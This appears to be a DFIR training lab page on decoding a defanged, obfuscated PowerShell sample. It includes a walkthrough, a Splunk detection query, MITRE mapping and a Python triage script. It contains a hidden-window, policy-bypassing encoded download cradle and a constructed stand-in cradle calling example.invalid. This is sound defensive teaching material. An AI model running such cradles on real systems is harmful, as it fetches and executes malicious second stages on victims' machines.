Advanced DFIR Malware PowerShell

Suspicious PowerShell Analysis

โฑ 90โ€“120 minutes
๐ŸŽฏ Advanced
๐Ÿ“ฅ VirtualBox OVA
๐Ÿ”ง FLARE VM, CyberChef, Splunk

A heavily obfuscated PowerShell script was found running on an endpoint. Decode it, understand the attack chain, extract IOCs, and build detections that would catch it next time.

🧪 Lab Description

This advanced DFIR lab gives you a real obfuscated PowerShell sample (safely defanged) recovered from a compromised endpoint. You'll use static and dynamic analysis techniques to decode the payload, map the attack to MITRE ATT&CK, extract network IOCs, and create both Splunk detection rules and YARA signatures.

The sample uses several layers of obfuscation, including Base64 encoding, string concatenation, and reflection: techniques commonly used by both commodity malware and APT actors.

🎯 Learning Objectives

  • Identify PowerShell obfuscation techniques (Base64, concatenation, reflection)
  • Use CyberChef to decode multi-layer obfuscated scripts
  • Perform safe dynamic analysis using FLARE VM sandbox
  • Extract network IOCs: C2 domains, IP addresses, user-agents
  • Map PowerShell TTPs to MITRE ATT&CK (T1059.001, T1027, T1105)
  • Write a Splunk PowerShell detection rule (Script Block Logging)
  • Create a basic YARA rule for the decoded payload

📋 Prerequisites

  • Completion of RDP Brute Force Detection lab
  • Basic PowerShell knowledge (not required but helpful)
  • Familiarity with Base64 encoding concepts
  • VirtualBox with 16GB RAM available (FLARE VM is resource-heavy)
  • Understanding of MITRE ATT&CK framework

๐Ÿ“ The Sample (Defanged)

The following is the obfuscated PowerShell command recovered from endpoint memory:

# DO NOT RUN - Defanged sample for analysis only
pOwErSHeLl.EXE -NoP -NonI -W Hidden -Exec Bypass -Enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIA QwBsAGkAZQBuAHQAOwAkAHMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIA aQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBbAFIARQBEAEEAQwBUAEUA RABdAC8AcABhAHkAbABvAGEAZAAnACkA...

Your first task: decode this and identify what it's doing before running any further analysis.

⚠ Walkthrough (Spoiler Alert)

⚠ This is an advanced lab. Spend at least 30 minutes on your own before reading this.

Step 1 - Initial Triage: The command-line switches are already telling. The abbreviations -NoP -NonI -W Hidden -Exec Bypass expand to -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass, a classic malware invocation pattern (MITRE T1059.001).

Step 2 - Decode Base64: Extract the -Enc value and decode it in CyberChef with "From Base64" followed by "Decode text" (UTF-16LE). The result is a WebClient download cradle.

Step 3 - Extract IOCs: The decoded script downloads a second stage from a C2 URL. Extract the domain, the URI path, and the User-Agent string. Submit the domain to VirusTotal (in the lab you get a pre-canned VT report).

Step 4 - Splunk Detection Rule:

index=wineventlog EventCode=4104
| search ScriptBlockText="*-enc*" OR ScriptBlockText="*WebClient*" OR ScriptBlockText="*DownloadString*"
| stats count by ComputerName, UserID, ScriptBlockText
| where count > 1

Step 5 - MITRE Mapping: T1059.001 (PowerShell), T1027 (Obfuscated Files), T1105 (Ingress Tool Transfer), T1071.001 (Web Protocols for C2).
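As an added example (not part of the lab materials), the Python below automates Steps 1 to 3 of the walkthrough: it expands the abbreviated powershell.exe switches, decodes the -Enc blob (Base64 over UTF-16LE, the same recipe as the CyberChef steps) and pulls out the cradle markers and URLs. The switch list, the marker list and the example.invalid stand-in sample are my own constructions, not lab artefacts.

```python
"""Triage an encoded PowerShell command line: expand switches, decode -Enc, list IOCs."""
import base64
import re

# powershell.exe accepts any unambiguous, case-insensitive prefix of a switch name.
SWITCHES = ("NoProfile", "NonInteractive", "NoLogo", "NoExit", "WindowStyle",
            "ExecutionPolicy", "EncodedCommand", "Command", "File")
CRADLE_MARKERS = ("New-Object", "Net.WebClient", "DownloadString", "DownloadFile",
                  "Invoke-Expression", "IEX", "Start-BitsTransfer")
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/=]+\.*$")   # a Base64 piece, maybe ending in "..."
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def expand_switch(token):
    """'-NoP' -> 'NoProfile'; None if not a switch, unknown, or ambiguous ('-No')."""
    if not token.startswith("-"):
        return None
    hits = [s for s in SWITCHES if s.lower().startswith(token[1:].lower())]
    return hits[0] if len(hits) == 1 else None


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -Enc/-EncodedCommand, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if expand_switch(tok) != "EncodedCommand":
            continue
        # Re-join a blob that was wrapped over several pieces, as in the recovered sample.
        parts = []
        for t in tokens[i + 1:]:
            if not B64_TOKEN.match(t):
                break
            parts.append(t.rstrip("."))
        blob = "".join(parts)
        blob += "=" * (-len(blob) % 4)              # restore stripped padding
        raw = base64.b64decode(blob)
        # -EncodedCommand is always UTF-16LE; drop a dangling odd byte before decoding.
        return raw[: len(raw) - len(raw) % 2].decode("utf-16-le", "replace")
    return None


def triage(cmdline):
    """Switches used, decoded script, cradle markers found and URLs seen."""
    switches = sorted({s for s in map(expand_switch, cmdline.split()) if s})
    script = decode_encoded_command(cmdline) or ""
    markers = [m for m in CRADLE_MARKERS if m.lower() in script.lower()]
    return {"switches": switches, "script": script,
            "markers": markers, "urls": URL_RE.findall(script)}


# Constructed, defanged stand-in for the recovered sample (example.invalid never resolves).
SAMPLE_SCRIPT = "$s=New-Object Net.WebClient;$s.DownloadString('https://example.invalid/payload')"
SAMPLE_CMDLINE = ("pOwErSHeLl.EXE -NoP -NonI -W Hidden -Exec Bypass -Enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())
```

Run `triage(SAMPLE_CMDLINE)` to see the expanded switches, the decoded cradle, the matched markers and the URL; the same function accepts the defanged sample above, whitespace-wrapped blob and trailing "..." included.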